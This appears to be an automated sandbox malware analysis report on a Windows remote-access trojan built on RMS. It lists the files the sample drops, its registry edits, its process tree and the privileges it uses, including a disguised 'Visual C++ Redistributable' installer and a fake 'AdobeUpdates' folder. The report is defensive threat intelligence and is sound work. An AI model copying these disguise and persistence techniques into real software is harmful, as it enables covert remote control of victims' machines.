Malware Analysis Report

2024-11-30 19:49

Sample ID 220128-sqmvesfeaj
Target 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
SHA256 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6
Tags
rms evasion rat trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6

Threat Level: Known bad

The file 550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6 was found to be: Known bad.

Malicious Activity Summary

rms evasion rat trojan upx

RMS

Executes dropped EXE

Stops running service(s)

UPX packed file

Loads dropped DLL

Enumerates connected drives

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Runs net.exe

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Kills process with taskkill

Suspicious behavior: SetClipboardViewer

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 15:19

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 15:19

Reported

2022-01-28 16:02

Platform

win10-en-20211208

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f75f03d.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AB7AA605-500F-4153-8207-FB5563419112} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f75f040.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\f75f03d.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF5BB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFB3A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 2564 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe C:\Users\Admin\AppData\Local\Temp\set.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 3824 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\set.exe C:\Users\Admin\AppData\Local\Temp\setting.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 4084 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\setting.exe C:\Windows\SysWOW64\cmd.exe
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1068 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 1736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3560 wrote to memory of 3260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3260 wrote to memory of 3984 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 2648 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 3136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 3560 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
